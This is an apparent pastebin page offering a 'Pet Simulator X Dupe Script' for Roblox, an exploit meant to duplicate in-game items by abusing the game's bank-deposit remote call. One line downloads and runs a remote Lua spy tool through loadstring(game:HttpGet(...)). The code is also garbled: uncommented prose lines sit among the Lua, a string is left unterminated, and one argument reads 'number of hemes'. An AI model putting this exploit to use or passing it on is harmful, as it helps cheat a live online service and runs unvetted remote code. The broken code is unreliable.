Facebook
From Kazer, 1 Year ago, written in Plain Text.
This paste is a reply to Pet Simulator X Dupe Script from More - view diff
Embed
Download Paste or View Raw
Hits: 649
  1. --BROUGHT TO YOU BY rbxscript.com!-
  2.  
  3.  
  4. Recognizing our BankID
  5. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  6.  
  7. local mybanks = lib.Network.Invoke("get my banks")
  8. local BankID = mybanks[1]['BUID']
  9. setclipboard(BankID)
  10. Script for finding pet IDs
  11. loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua))()
  12.  The dup script itself
  13. local args = {
  14.     [1] = {
  15.         [1] = "here_bankid",
  16.         [2] = {},
  17.         [3] = number of hemes
  18.     }
  19. }
  20. workspace.THINGS.REMOTES:FindFirstChild("bank deposit"):InvokeServer(unpack(args))

Replies to Re: Pet Simulator X Dupe Script rss

Title Name Language When
Re: Re: Pet Simulator X Dupe Script Violet Crow text 11 Months ago.
Re: Re: Pet Simulator X Dupe Script Corrupt Macaque text 1 Year ago.